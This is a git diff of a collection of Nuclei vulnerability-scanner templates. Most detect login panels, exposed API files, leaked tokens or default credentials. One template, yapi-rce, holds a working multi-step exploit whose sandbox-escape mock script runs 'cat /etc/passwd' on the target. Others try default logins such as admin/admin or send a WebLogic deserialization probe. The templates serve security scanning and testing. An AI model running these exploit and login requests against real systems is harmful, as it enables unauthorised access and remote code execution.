"{{BaseURL}}/api/v1/swagger-ui/swagger.yaml" - "{{BaseURL}}/swagger-resources/restservices/v2/api-docs" + - "{{BaseURL}}/api/swagger_doc.json" stop-at-first-match: true matchers-condition: and matchers: @@ -62,3 +68,9 @@ requests: - type: status status: - 200 + extractors: + - type: regex + part: body + group: 1 + regex: + - " @version (v[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3})" diff --git a/poc/api/twilio-api.yaml b/poc/api/twilio-api.yaml index 9895746a8a..94674dffe2 100644 --- a/poc/api/twilio-api.yaml +++ b/poc/api/twilio-api.yaml @@ -5,7 +5,6 @@ info: author: gaurang severity: high tags: token,file - file: - extensions: - all @@ -13,4 +12,6 @@ file: extractors: - type: regex regex: - - "(?i)twilio(.{0,20})?SK[0-9a-f]{32}" \ No newline at end of file + - "(?i)twilio(.{0,20})?SK[0-9a-f]{32}" + +# digest: 4b0a00483046022100de47f62e4aba3b07360714c3650501e642d180616b8fadb9c6af82114a17dcbe022100838e8bb6b140938d0a973f78addd50f15927ce43b471f402373a3a8676b4f889:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/wadl-api-11083.yaml b/poc/api/wadl-api-11083.yaml index 35e018d786..1e046a7ef3 100644 --- a/poc/api/wadl-api-11083.yaml +++ b/poc/api/wadl-api-11083.yaml @@ -1,10 +1,10 @@ id: wadl-api info: name: wadl file disclosure - author: 0xrudra & manuelbua + author: 0xrudra,manuelbua severity: info tags: exposure,api - reference: | + reference: - https://github.com/dwisiswant0/wadl-dumper - https://www.nopsec.com/leveraging-exposed-wadl-xml-in-burp-suite/ requests: @@ -15,26 +15,24 @@ requests: - "{{BaseURL}}/api/application.wadl" - "{{BaseURL}}/api/v1/application.wadl" - "{{BaseURL}}/api/v2/application.wadl" + stop-at-first-match: true matchers: - name: http-get type: word words: - "This is simplified WADL with user and core resources only" - - "\"http://jersey.java.net/\"" + - "http://jersey.java.net" - "http://wadl.dev.java.net/2009/02" - condition: or - part: body - method: OPTIONS path: - "{{BaseURL}}" - "{{BaseURL}}/api/v1" - "{{BaseURL}}/api/v2" + stop-at-first-match: true matchers: - name: http-options type: word words: - "This is simplified WADL with user and core resources only" - - "\"http://jersey.java.net/\"" + - "http://jersey.java.net" - "http://wadl.dev.java.net/2009/02" - condition: or - part: body diff --git a/poc/api/yapi-detect.yaml b/poc/api/yapi-detect.yaml index 8cf92f5a49..3d24ff00ba 100644 --- a/poc/api/yapi-detect.yaml +++ b/poc/api/yapi-detect.yaml @@ -3,12 +3,13 @@ info: name: YApi Detect author: pikpikcu severity: info + metadata: + shodan-query: http.title:"YApi" tags: tech,yapi requests: - method: GET path: - - "{{BaseURL}}/" - - "{{BaseURL}}:3000" + - "{{BaseURL}}" matchers-condition: and matchers: - type: word diff --git a/poc/api/yapi-rce-11726.yaml b/poc/api/yapi-rce-11726.yaml index 0078f2b883..0afebedde5 100644 --- a/poc/api/yapi-rce-11726.yaml +++ b/poc/api/yapi-rce-11726.yaml @@ -1,17 +1,19 @@ id: yapi-rce - info: - name: Yapi Remote Code Execution + name: Yapi - Remote Code Execution author: pikpikcu severity: critical - description: A vulnerability in Yapi allows remote unauthenticated attackers to cause the product to execute arbitrary code. + description: Yapi allows remote unauthenticated attackers to cause the product to execute arbitrary code. reference: - https://www.secpulse.com/archives/162502.html - https://gist.github.com/pikpikcu/0145fb71203c8a3ad5c67b8aab47165b - https://twitter.com/sec715/status/1415484190561161216 - https://github.com/YMFE/yapi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-77 tags: yapi,rce - requests: - raw: - | # REQUEST 1 @@ -19,42 +21,35 @@ requests: Host: {{Hostname}} Content-Type: application/json;charset=UTF-8 - {"email":"{{randstr}}@example.com","password":"{{randstr}}","username":"{{randstr}}"} - + {"email":"{{randstr}}@interact.sh","password":"{{randstr}}","username":"{{randstr}}"} - | # REQUEST 2 GET /api/group/list HTTP/1.1 Host: {{Hostname}} Content-Type: application/json, text/plain, */* - - | # REQUEST 3 POST /api/project/add HTTP/1.1 Host: {{Hostname}} Content-Type: application/json;charset=UTF-8 {"name":"{{randstr}}","basepath":"","group_id":"{{group_id}}","icon":"code-o","color":"cyan","project_type":"private"} - - | # REQUEST 4 GET /api/project/get?id={{project_id}} HTTP/1.1 Host: {{Hostname}} - - | # REQUEST 5 POST /api/interface/add HTTP/1.1 Host: {{Hostname}} Content-Type: application/json;charset=UTF-8 {"method":"GET","catid":"{{project_id}}","title":"{{randstr_1}}","path":"/{{randstr_1}}","project_id":{{project_id}}} - - | # REQUEST 6 POST /api/plugin/advmock/save HTTP/1.1 Host: {{Hostname}} Content-Type: application/json;charset=UTF-8 {"project_id":"{{project_id}}","interface_id":"{{interface_id}}","mock_script":"const sandbox = this\r\nconst ObjectConstructor = this.constructor\r\nconst FunctionConstructor = ObjectConstructor.constructor\r\nconst myfun = FunctionConstructor('return process')\r\nconst process = myfun()\r\nmockJson = process.mainModule.require(\"child_process\").execSync(\"cat /etc/passwd\").toString()","enable":true} - - | # REQUEST 7 GET /mock/{{project_id}}/{{randstr_1}} HTTP/1.1 Host: {{Hostname}} - cookie-reuse: true extractors: - type: regex @@ -64,7 +59,6 @@ requests: part: body regex: - '"_id":([0-9]+),"group_name"' - - type: regex name: interface_id group: 1 @@ -72,7 +66,6 @@ requests: part: body regex: - '"req_body_form":\[\],"_id":([0-9]+)' - - type: regex name: project_id group: 1 @@ -80,14 +73,14 @@ requests: part: body regex: - '"tag":\[\],"_id":([0-9]+)' - matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" part: body - - type: status status: - 200 + +# Enhanced by mp on 2022/06/03 diff --git a/poc/atlassian/atlassian-crowd-panel-583.yaml b/poc/atlassian/atlassian-crowd-panel-583.yaml index 4fd18bcda4..c2f2c4aa9d 100644 --- a/poc/atlassian/atlassian-crowd-panel-583.yaml +++ b/poc/atlassian/atlassian-crowd-panel-583.yaml @@ -1,11 +1,8 @@ id: atlassian-crowd-panel - info: name: Atlassian Crowd panel detect author: organiccrap severity: info - tags: panel - requests: - method: GET path: diff --git a/poc/atlassian/atlassian-crowd-panel.yaml b/poc/atlassian/atlassian-crowd-panel.yaml index 3532e9a84c..d01a865ee9 100644 --- a/poc/atlassian/atlassian-crowd-panel.yaml +++ b/poc/atlassian/atlassian-crowd-panel.yaml @@ -1,25 +1,16 @@ id: atlassian-crowd-panel - info: - name: Atlassian Crowd Login Panel + name: Atlassian Crowd panel detect author: organiccrap - severity: info - description: An Atlassian Crowd login panel was discovered. - reference: - - https://www.atlassian.com/ - classification: - cwe-id: CWE-200 - tags: panel,atlassian - + severity: low requests: - method: GET path: - '{{BaseURL}}/crowd/console/login.action' - + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 matchers: - type: word words: - Atlassian Crowd - Login part: body - -# Enhanced by mp on 2022/03/20 diff --git a/poc/atlassian/bitbucket-takeover-740.yaml b/poc/atlassian/bitbucket-takeover-740.yaml index f9234ad7a3..2987941c14 100644 --- a/poc/atlassian/bitbucket-takeover-740.yaml +++ b/poc/atlassian/bitbucket-takeover-740.yaml @@ -1,25 +1,21 @@ id: bitbucket-takeover - info: name: Bitbucket Takeover Detection author: pdteam severity: high tags: takeover reference: https://github.com/EdOverflow/can-i-take-over-xyz - requests: - method: GET path: - "{{BaseURL}}" - matchers-condition: and matchers: - type: word words: - "Repository not found" part: body - - type: word words: - "text/plain" - part: header \ No newline at end of file + part: header diff --git a/poc/atlassian/confluence-detect-1189.yaml b/poc/atlassian/confluence-detect-1189.yaml index 0e17bc5ab9..4809b79801 100644 --- a/poc/atlassian/confluence-detect-1189.yaml +++ b/poc/atlassian/confluence-detect-1189.yaml @@ -1,17 +1,27 @@ id: confluence-detect info: - name: Confluence Detect - author: philippedelteil + name: Confluence Detection + author: philippedelteil,AdamCrosser,6mile severity: info - description: Allows you to detect Atlassian Confluence instances + description: | + This nuclei template is used to detect the presence of Confluence, a popular collaboration software. + classification: + cpe: cpe:2.3:a:atlassian:confluence_server:*:*:*:*:*:*:*:* metadata: - shodan-query: http.component:"Atlassian Confluence" - tags: tech,confluence,atlassian + max-request: 5 + vendor: atlassian + product: confluence_server + shodan-query: + - http.component:"Atlassian Confluence" + - http.component:"atlassian confluence" + category: productivity + tags: tech,confluence,atlassian,detect -requests: +http: - method: GET path: + - "{{BaseURL}}/dologin.action" - "{{BaseURL}}" - "{{BaseURL}}/pages" - "{{BaseURL}}/confluence" @@ -19,22 +29,25 @@ requests: redirects: true stop-at-first-match: true - matchers-condition: or matchers: - - type: word - part: header - words: - - '-confluence-' - case-insensitive: true - - - type: word - part: body - words: - - 'confluence-base-url' + - type: dsl + dsl: + - contains(to_lower(header), '-confluence-') + - contains(to_lower(body), 'confluence-base-url') extractors: - type: regex - part: body + name: version group: 1 regex: + - '' - 'Atlassian Confluence ([a-z0-9-._]+)' + + - type: regex + name: hostname + group: 1 + regex: + - '' + - '' + - '' +# digest: 4a0a004730450221009bf2f9a3fec8732657aa0e11ec7a7bad6998606a6fdf448adb743732992b14f3022027018043be481632180a2d55600542cba51743a087e2657c16dbd23428ea2382:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/atlassian/jira-service-desk-signup-8321.yaml b/poc/atlassian/jira-service-desk-signup-8321.yaml index 6604106545..558b3ff970 100644 --- a/poc/atlassian/jira-service-desk-signup-8321.yaml +++ b/poc/atlassian/jira-service-desk-signup-8321.yaml @@ -3,6 +3,7 @@ info: name: Jira Service Desk Signup author: TechbrunchFR severity: medium + tags: jira,atlassian requests: - method: POST path: diff --git a/poc/atlassian/jira-unauthenticated-dashboards-8324.yaml b/poc/atlassian/jira-unauthenticated-dashboards-8324.yaml index f31db155cc..63e0ccd5e3 100644 --- a/poc/atlassian/jira-unauthenticated-dashboards-8324.yaml +++ b/poc/atlassian/jira-unauthenticated-dashboards-8324.yaml @@ -1,6 +1,6 @@ id: jira-unauthenticated-dashboards # If public sharing is ON it allows users to share dashboards and filters with all users including -# those that are not logged in. Those dashboard and filters could reveal potentially sensitive information. +# those that are not logged in. Those dashboards and filters could reveal potentially sensitive information. info: name: Jira Unauthenticated Dashboards author: TechbrunchFR diff --git a/poc/auth/BlindSQLAuth.yaml b/poc/auth/BlindSQLAuth.yaml index 815cf7212b..695dccaf08 100644 --- a/poc/auth/BlindSQLAuth.yaml +++ b/poc/auth/BlindSQLAuth.yaml @@ -1,7 +1,7 @@ id: time-based-sqli info: name: Time-Based Blind SQL Injection - author: 3rag + author: Rzizah github.com/rzizah severity: Critical description: Detects time-based blind SQL injection vulnerability http: diff --git a/poc/auth/Shopify-custom-token.yaml b/poc/auth/Shopify-custom-token.yaml index fbdd23d61d..b4ef9d4c53 100644 --- a/poc/auth/Shopify-custom-token.yaml +++ b/poc/auth/Shopify-custom-token.yaml @@ -1,16 +1,13 @@ id: shopify-custom-token - info: name: Shopify Custom App Access Token author: gaurang severity: high tags: token,file - file: - extensions: - all - extractors: - type: regex regex: - - "shpca_[a-fA-F0-9]{32}" \ No newline at end of file + - "shpca_[a-fA-F0-9]{32}" diff --git a/poc/auth/activemq-default-login-47.yaml b/poc/auth/activemq-default-login-47.yaml index a4dea884a5..ae5ac0f72c 100644 --- a/poc/auth/activemq-default-login-47.yaml +++ b/poc/auth/activemq-default-login-47.yaml @@ -1,18 +1,18 @@ id: activemq-default-login - info: name: Apache ActiveMQ Default Login author: pdteam severity: medium + description: Apache ActiveMQ default login information was discovered. + reference: + - https://knowledge.broadcom.com/external/article/142813/vulnerability-apache-activemq-admin-con.html tags: apache,activemq,default-login - requests: - raw: - | GET /admin/ HTTP/1.1 Host: {{Hostname}} Authorization: Basic {{base64(username + ':' + password)}} - payloads: username: - user @@ -26,4 +26,6 @@ requests: words: - 'Welcome to the Apache ActiveMQ Console of ' - '

Broker

' - condition: and \ No newline at end of file + condition: and + +# Enhanced by mp on 2022/03/07 diff --git a/poc/auth/adobe-connect-central-login.yaml b/poc/auth/adobe-connect-central-login.yaml index 1218c9f8d7..fdaf816057 100644 --- a/poc/auth/adobe-connect-central-login.yaml +++ b/poc/auth/adobe-connect-central-login.yaml @@ -1,10 +1,18 @@ id: adobe-connect-central-login info: - name: Adobe Connect Central Login + name: Adobe Connect Central Login Panel author: dhiyaneshDk + description: An Adobe Connect Central login panel was detected. severity: info - tags: adobe,panel + tags: adobe,panel,connect-central + reference: + - https://www.adobe.com/products/adobeconnect.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: + cwe-id: CWE-200 requests: - method: GET @@ -21,3 +29,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/20 diff --git a/poc/auth/aims-password-mgmt-client.yaml b/poc/auth/aims-password-mgmt-client.yaml index a178296f3f..c6f768a5c9 100644 --- a/poc/auth/aims-password-mgmt-client.yaml +++ b/poc/auth/aims-password-mgmt-client.yaml @@ -3,8 +3,16 @@ id: aims-password-mgmt-client info: name: Aims Password Management Client Detect author: iamthefrogy + description: An Aims Password management client was detected. severity: info tags: panel,aims + reference: + - https://www.avatier.com/products/identity-management/password-management/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: + cwe-id: CWE-200 requests: - method: GET @@ -15,3 +23,5 @@ requests: - type: word words: - "Avatier Corporation" + +# Enhanced by mp on 2022/03/21 diff --git a/poc/auth/aims-password-portal-222.yaml b/poc/auth/aims-password-portal-222.yaml index eb21d8e0eb..800dd21cad 100644 --- a/poc/auth/aims-password-portal-222.yaml +++ b/poc/auth/aims-password-portal-222.yaml @@ -5,7 +5,7 @@ info: author: dhiyaneshDK severity: info reference: https://www.exploit-db.com/ghdb/6576 - tags: panel + tags: panel,aims requests: - method: GET diff --git a/poc/auth/alibaba-mongoshake-unauth.yaml b/poc/auth/alibaba-mongoshake-unauth.yaml index 6de46b6ec7..23048a649f 100644 --- a/poc/auth/alibaba-mongoshake-unauth.yaml +++ b/poc/auth/alibaba-mongoshake-unauth.yaml @@ -4,7 +4,7 @@ info: name: Alibaba Mongoshake Unauth author: pikpikcu severity: info - tags: mongoshake,unauth + tags: mongoshake,unauth,alibaba requests: - method: GET diff --git a/poc/auth/amazon-mws-auth-token-282.yaml b/poc/auth/amazon-mws-auth-token-282.yaml index eb41de1dae..28e8063f5e 100644 --- a/poc/auth/amazon-mws-auth-token-282.yaml +++ b/poc/auth/amazon-mws-auth-token-282.yaml @@ -1,16 +1,13 @@ id: amazon-mws-auth-token - info: name: Amazon MWS Auth Token author: puzzlepeaches severity: info - tags: exposure,token,aws,amazon,auth - + tags: exposure,token,aws requests: - method: GET path: - "{{BaseURL}}" - extractors: - type: regex part: body diff --git a/poc/auth/amazon-mws-auth-token-value.yaml b/poc/auth/amazon-mws-auth-token-value.yaml index 3f66fd9942..0ab5703b9c 100644 --- a/poc/auth/amazon-mws-auth-token-value.yaml +++ b/poc/auth/amazon-mws-auth-token-value.yaml @@ -1,24 +1,16 @@ -id: amazon-mws-auth-token-value - -info: - author: puzzlepeaches - name: "Amazon MWS Auth Token" - severity: medium - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - type: regex - part: body - regex: - - "amzn\\.mws\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" - - extractors: - - type: regex - part: body - regex: - - "amzn\\.mws\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" +id: amazon-mws-auth-token-value + +info: + name: Amazon MWS Auth Token + author: gaurang + severity: medium + tags: token,file,amazon,auth + +file: + - extensions: + - all + + extractors: + - type: regex + regex: + - "amzn\\.mws\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" diff --git a/poc/auth/ambari-default-login.yaml b/poc/auth/ambari-default-login.yaml index e251839b56..75b4ec03c1 100644 --- a/poc/auth/ambari-default-login.yaml +++ b/poc/auth/ambari-default-login.yaml @@ -1,11 +1,16 @@ id: ambari-default-login - info: name: Apache Ambari Default Login author: pdteam - severity: medium + description: An Apache Ambari default admin login was discovered. + severity: high + reference: + - https://ambari.apache.org/1.2.0/installing-hadoop-using-ambari/content/ambari-chap3-1.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: ambari,default-login,apache - requests: - raw: - | @@ -24,3 +29,5 @@ requests: - '"Users" : {' - 'AMBARI.' condition: and + +# Enhanced by mp on 2022/03/22 diff --git a/poc/auth/apc-ups-login.yaml b/poc/auth/apc-ups-login.yaml index f28e384f2c..46722d9e73 100644 --- a/poc/auth/apc-ups-login.yaml +++ b/poc/auth/apc-ups-login.yaml @@ -4,7 +4,8 @@ info: name: APC UPS Login author: droberson severity: info - reference: https://www.shodan.io/search?query=title%3A%22APC+%7C+Log+On%22 + reference: + - https://www.shodan.io/search?query=title%3A%22APC+%7C+Log+On%22 tags: iot,panel requests: diff --git a/poc/auth/apisix-default-login-490.yaml b/poc/auth/apisix-default-login-490.yaml index c16b0c60b1..d89104b847 100644 --- a/poc/auth/apisix-default-login-490.yaml +++ b/poc/auth/apisix-default-login-490.yaml @@ -1,13 +1,22 @@ id: apisix-default-login + info: - name: Apache Apisix Default Login + name: Apache Apisix Default Admin Login author: pdteam - severity: critical - tags: apisix,apache,default-login + severity: high + description: An Apache Apisix default admin login was discovered. + reference: + - https://apisix.apache.org/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 metadata: shodan-query: title:"Apache APISIX Dashboard" fofa-query: title="Apache APISIX Dashboard" product: https://apisix.apache.org + tags: apisix,apache,default-login + requests: - raw: - | @@ -18,20 +27,25 @@ requests: Content-Type: application/json;charset=UTF-8 {"username":"{{user}}","password":"{{pass}}"} + attack: pitchfork payloads: user: - admin pass: - admin + matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - '"data"' - '"token"' - '"code":0' condition: and + +# Enhanced by mp on 2022/03/22 diff --git a/poc/auth/apollo-default-login.yaml b/poc/auth/apollo-default-login.yaml index 696e2a1121..c9e119d097 100644 --- a/poc/auth/apollo-default-login.yaml +++ b/poc/auth/apollo-default-login.yaml @@ -1,18 +1,20 @@ id: apollo-default-login + info: name: Apollo Default Login author: PaperPen severity: high description: An Apollo default login was discovered. - metadata: - shodan-query: http.favicon.hash:11794165 reference: - https://github.com/apolloconfig/apollo classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 + metadata: + shodan-query: http.favicon.hash:11794165 tags: apollo,default-login + requests: - raw: - | @@ -23,15 +25,18 @@ requests: Referer: {{BaseURL}}/signin? username={{user}}&password={{pass}}&login-submit=Login + - | GET /user HTTP/1.1 Host: {{Hostname}} + attack: pitchfork payloads: user: - apollo pass: - admin + cookie-reuse: true req-condition: true matchers-condition: and @@ -42,6 +47,7 @@ requests: - '"userId":' - '"email":' condition: or + - type: dsl dsl: - "status_code_1 == 302 && status_code_2 == 200" diff --git a/poc/auth/arl-default-login-539.yaml b/poc/auth/arl-default-login-539.yaml index 50f4ac4d1c..0b8d67077d 100644 --- a/poc/auth/arl-default-login-539.yaml +++ b/poc/auth/arl-default-login-539.yaml @@ -1,13 +1,8 @@ id: arl-default-login info: - name: ARL Default Admin Login + name: ARL Default Login author: pikpikcu - description: An ARL default admin login was discovered. severity: high - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 tags: arl,default-login requests: - raw: @@ -34,5 +29,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/03/22 diff --git a/poc/auth/atvise-login-589.yaml b/poc/auth/atvise-login-589.yaml index 74ba38fb08..360d06ce3b 100644 --- a/poc/auth/atvise-login-589.yaml +++ b/poc/auth/atvise-login-589.yaml @@ -9,13 +9,10 @@ info: - https://www.exploit-db.com/ghdb/7837 - https://www.atvise.com/en classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cve-id: cwe-id: CWE-200 metadata: - google-dork: intitle:"atvise - next generation" - tags: panel,atvise + google-query: intitle:"atvise - next generation" + tags: panel,atvise,edb requests: - method: GET diff --git a/poc/auth/avatier-password-management.yaml b/poc/auth/avatier-password-management.yaml index 49cd4c37ae..62d6395e8a 100644 --- a/poc/auth/avatier-password-management.yaml +++ b/poc/auth/avatier-password-management.yaml @@ -1,37 +1,32 @@ id: avatier-password-management info: - name: Avatier Password Management Panel - author: praetorian-thendrickson,iamthefrogy,dhiyaneshDK + name: Avatier Password Management Panel Detect + author: praetorian-thendrickson severity: info description: An Avatier password management panel was detected. reference: - - https://www.exploit-db.com/ghdb/6576 - - https://www.avatier.com/products/identity-management/password-management/ - classification: - cwe-id: CWE-200 + - https://www.avatier.com metadata: shodan-query: http.favicon.hash:983734701 - tags: panel,avatier,aims + tags: panel,avatier + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: + cwe-id: CWE-200 requests: - method: GET path: - '{{BaseURL}}/aims/ps/' - redirects: true - max-redirects: 2 - matchers-condition: or + matchers-condition: and matchers: - type: word words: - 'LabelWelcomeToPS' - 'Avatier Corporation' - - 'Welcome to Password Management' - condition: or - - - type: word - words: - - 'Password Management Client' + condition: and # Enhanced by mp on 2022/03/20 diff --git a/poc/auth/aws-access-key-value-622.yaml b/poc/auth/aws-access-key-value-622.yaml index 1448677b12..b942b0a23a 100644 --- a/poc/auth/aws-access-key-value-622.yaml +++ b/poc/auth/aws-access-key-value-622.yaml @@ -4,19 +4,13 @@ info: name: AWS Access Key ID Value author: Swissky severity: info + tags: exposure,token,aws,amazon requests: - method: GET path: - "{{BaseURL}}" - matchers-condition: and - matchers: - - type: regex - part: body - regex: - - "(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" - extractors: - type: regex part: body diff --git a/poc/auth/azkaban-default-login-674.yaml b/poc/auth/azkaban-default-login-674.yaml index 5e705ae10d..5d9e13ca58 100644 --- a/poc/auth/azkaban-default-login-674.yaml +++ b/poc/auth/azkaban-default-login-674.yaml @@ -1,47 +1,47 @@ -id: azkaban-default-login -info: - name: Azkaban Web Client Default Credential - author: pussycat0x - severity: high - description: Azkaban is a batch workflow job scheduler created at LinkedIn to run Hadoop jobs. Default web client credentials were discovered. - reference: - - https://www.shodan.io/search?query=http.title%3A%22Azkaban+Web+Client%22 - tags: default-login,azkaban - classification: - cwe-id: CWE-798 -requests: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - - action=login&username={{username}}&password={{password}} - payloads: - username: - - admin - password: - - admin - attack: pitchfork - matchers-condition: and - matchers: - - type: word - words: - - '"session.id"' - - '"success"' - condition: and - - type: word - words: - - 'azkaban.browser.session.id' - - 'application/json' - condition: and - part: header - - type: status - status: - - 200 - extractors: - - type: kval - kval: - - azkaban.browser.session.id - -# Enhanced by mp on 2022/03/03 +id: azkaban-default-login + +info: + name: Azkaban Web Client Default Credential + author: pussycat0x + severity: high + reference: https://www.shodan.io/search?query=http.title%3A%22Azkaban+Web+Client%22 + tags: default-login,azkaban + +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + action=login&username={{username}}&password={{password}} + + payloads: + username: + - admin + password: + - admin + attack: pitchfork + matchers-condition: and + matchers: + - type: word + words: + - '"session.id"' + - '"success"' + condition: and + + - type: word + words: + - 'azkaban.browser.session.id' + - 'application/json' + condition: and + part: header + + - type: status + status: + - 200 + + extractors: + - type: kval + kval: + - azkaban.browser.session.id diff --git a/poc/auth/canal-default-login-848.yaml b/poc/auth/canal-default-login-848.yaml index a4c4a1b801..733d7d16f3 100644 --- a/poc/auth/canal-default-login-848.yaml +++ b/poc/auth/canal-default-login-848.yaml @@ -1,11 +1,16 @@ id: canal-default-login - info: name: Alibaba Canal Default Login author: pdteam + description: An Alibaba Canal default login was discovered. severity: high + reference: + - https://github.com/alibaba/canal/wiki/ClientAdapter + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: alibaba,default-login - requests: - raw: - | @@ -14,22 +19,21 @@ requests: Content-Type: application/json {"username":"{{user}}","password":"{{pass}}"} - attack: pitchfork payloads: user: - admin pass: - 123456 - matchers-condition: and matchers: - type: status status: - 200 - - type: word condition: and words: - 'data":{"token"' - '"code":20000' + +# Enhanced by mp on 2022/03/22 diff --git a/poc/auth/cisco-systems-login.yaml b/poc/auth/cisco-systems-login.yaml index 25607b3bbf..96ae7b9ee4 100644 --- a/poc/auth/cisco-systems-login.yaml +++ b/poc/auth/cisco-systems-login.yaml @@ -2,11 +2,12 @@ id: cisco-systems-login info: name: Cisco Systems Login - author: dhiyaneshDk + author: dhiyaneshDk,idealphase severity: info - tags: panel,cisco metadata: - shodan-query: 'http.title:"Cisco Systems Login"' + shodan-query: http.title:"Cisco Systems Login" + google-query: intitle:"Cisco Systems Login" + tags: panel,cisco requests: - method: GET @@ -18,8 +19,14 @@ requests: - type: word part: body words: - - "Cisco Systems Login" + - "Cisco Systems Login" - type: status status: - 200 + + extractors: + - type: regex + group: 1 + regex: + - '' + redirects: true matchers: - type: dsl dsl: - - 'status_code==302 && contains(set_cookie, "_icl_current_admin_language")' + - 'contains(tolower(all_headers), "text/html") && contains(set_cookie, "_icl_current_admin_language") && contains(body, "\">")' diff --git a/poc/cve/CVE-2018-2893.yaml b/poc/cve/CVE-2018-2893.yaml index 94bfcc5ead..b4cd70ff8e 100644 --- a/poc/cve/CVE-2018-2893.yaml +++ b/poc/cve/CVE-2018-2893.yaml @@ -1,18 +1,25 @@ id: CVE-2018-2893 info: - name: Oracle WebLogic Server Deserialization RCE (CVE-2018-2893) + name: Oracle WebLogic Server - Remote Code Execution author: milo2012 severity: critical - description: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent - WLS Core Components). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). - reference: https://www.anquanke.com/post/id/152164, https://vulners.com/nessus/WEBLOGIC_CVE_2018_2893.NASL + description: | + The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services) versions 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3 contain an easily exploitable vulnerability that allows unauthenticated attackers with network access via T3 to compromise Oracle WebLogic Server. + reference: + - https://www.anquanke.com/post/id/152164 + - https://vulners.com/nessus/WEBLOGIC_CVE_2018_2893.NASL + - https://nvd.nist.gov/vuln/detail/CVE-2018-2893 + - http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2018-2893 tags: cve,cve2018,weblogic,network,deserialization,rce,oracle + metadata: + max-request: 1 -network: +tcp: - inputs: - data: "t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n" @@ -35,3 +42,5 @@ network: part: raw words: - "StreamMessageImpl cannot be cast to weblogic" + +# Enhanced by mp on 2022/04/14 diff --git a/poc/cve/CVE-2018-5230.yaml b/poc/cve/CVE-2018-5230.yaml index 78ca057594..3073e580b5 100644 --- a/poc/cve/CVE-2018-5230.yaml +++ b/poc/cve/CVE-2018-5230.yaml @@ -4,6 +4,15 @@ info: name: Atlassian Confluence Status-List XSS author: madrobot severity: medium + tags: cve,cve2018,atlassian,confluence,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2018-5230 + cwe-id: CWE-79 + description: "The issue collector in Atlassian Jira before version 7.6.6, from version 7.7.0 before version 7.7.4, from version 7.8.0 before version 7.8.4 and from version 7.9.0 before version 7.9.2 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the error message of custom fields when an invalid value is specified." + reference: + - https://jira.atlassian.com/browse/JRASERVER-67289 requests: - method: GET diff --git a/poc/cve/CVE-2018-5233.yaml b/poc/cve/CVE-2018-5233.yaml index 611c7a3a1e..6dd9374e44 100644 --- a/poc/cve/CVE-2018-5233.yaml +++ b/poc/cve/CVE-2018-5233.yaml @@ -8,11 +8,6 @@ info: Cross-site scripting (XSS) vulnerability in system/src/Grav/Common/Twig/Twig.php in Grav CMS before 1.3.0 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to admin/tools. reference: https://nvd.nist.gov/vuln/detail/CVE-2018-5233 tags: cve,cve2018,xss,grav - classification: - 